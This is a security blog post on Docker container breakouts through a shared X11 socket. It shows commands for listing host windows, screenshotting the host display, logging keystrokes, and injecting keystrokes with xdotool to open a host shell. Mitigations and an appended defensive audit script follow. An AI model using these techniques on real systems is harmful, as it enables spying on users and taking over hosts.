Use Docker to run GUI applications they said.
Mount the X11 socket they said.
Allow other users to access your X session they said.
This post covers Docker container breakouts by abusing bad security practices related to the X11 socket.
To display windows spawned through a Docker container, people often launch containers following these steps:
- `-e DISPLAY=$DISPLAY` to share the display variable value
- `-v /tmp/.X11-unix:/tmp/.X11-unix:ro` shares the X11 socket, optionally as read only.
- “I can’t see the window, let’s google…”
- “Let’s just execute `xhost +local:root` and it works!”
The X11 socket is mounted as read only, so it’s secure, right?
These attacks can be performed after gaining access to a Docker container:
Reading Window Information
Using `xwininfo -root -tree` it’s possible to check which windows are open on the host system, including the window titles:
```
[...]
0xredacted "[i3 con] container around 0xredacted": ("i3-frame" "i3-frame")
[...]
1 child:
0xredacted "Write: super secret thing": ("Msgcompose" "Thunderbird")
[...]
[...]
```
```
xwd -root -screen > screenshot.xwd && convert screenshot.xwd screenshot.png
```
can be used to create a screenshot of the host’s display, which makes it possible to watch every action a user performs on the system.
By mounting the X11 socket into the container a user doesn’t just mount the display. Additionally, the keyboard also gets shared, so to say. With this, it’s possible to log all keystrokes. There may be better tools for this, but during tests xkey seemed to perform very reliably. Using `xkey` it’s possible to perform a specific action in case a previously defined key gets hit.
Getting a shell
Although it’s not very stealthy, this method allows getting a shell on the host system. This works by sending keystrokes to the X server in order to open a terminal and execute commands:
```
xdotool key <Shortcut to open a terminal>
xdotool type 'xterm'
xdotool key Return
xdotool type --delay 50 '<Desired reverse or bind shell command>'
xdotool key Return
```
Mitigations
- Use XAuthority and don’t use the root user to spawn an X application.
- Check x11docker, which basically creates a new X server for isolation purposes.
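As an added example (not code from the post), a small audit over `docker inspect` output that flags the exact combination described above: the host X11 socket directory bind-mounted (read-only or not), `DISPLAY` forwarded, and the container running as root. It assumes the standard `docker inspect` fields `Name`, `Mounts`, `Config.Env` and `Config.User`; the sample record is constructed.

```python
"""Audit `docker inspect` JSON for X11-socket exposure (added example, not from the post)."""
import json
import sys

X11_SOCKET_DIR = "/tmp/.X11-unix"


def audit_container(info: dict) -> list[str]:
    """Return findings for one `docker inspect` record (empty list if clean)."""
    findings = []
    name = info.get("Name", "?").lstrip("/")
    for mount in info.get("Mounts", []):
        src = mount.get("Source", "")
        if src == X11_SOCKET_DIR or src.startswith(X11_SOCKET_DIR + "/"):
            # A read-only bind mount does not block connecting to a unix socket,
            # so the ":ro" from the post gives no protection at all.
            mode = "rw" if mount.get("RW", True) else "ro"
            findings.append(f"{name}: host X11 socket mounted ({mode}); ro does not limit X access")
    config = info.get("Config") or {}
    if any(e.startswith("DISPLAY=") for e in config.get("Env") or []):
        findings.append(f"{name}: DISPLAY forwarded into container")
    user = config.get("User") or ""
    if user in ("", "0", "root") or user.startswith(("0:", "root:")):
        findings.append(f"{name}: runs as root (xhost +local:root grants it X access)")
    return findings


def audit(inspect_json: str) -> list[str]:
    """Audit every record in a `docker inspect` JSON array."""
    out = []
    for info in json.loads(inspect_json):
        out.extend(audit_container(info))
    return out


# Constructed sample resembling `docker inspect` output for one GUI container
# launched the way the post describes.
SAMPLE = json.dumps([{
    "Name": "/gui-app",
    "Config": {"User": "", "Env": ["DISPLAY=:0", "PATH=/usr/bin"]},
    "Mounts": [{"Type": "bind", "Source": "/tmp/.X11-unix",
                "Destination": "/tmp/.X11-unix", "Mode": "ro", "RW": False}],
}])

if __name__ == "__main__":
    # Pipe real data in with: docker inspect $(docker ps -q) | python3 audit.py
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    for line in audit(data):
        print(line)
```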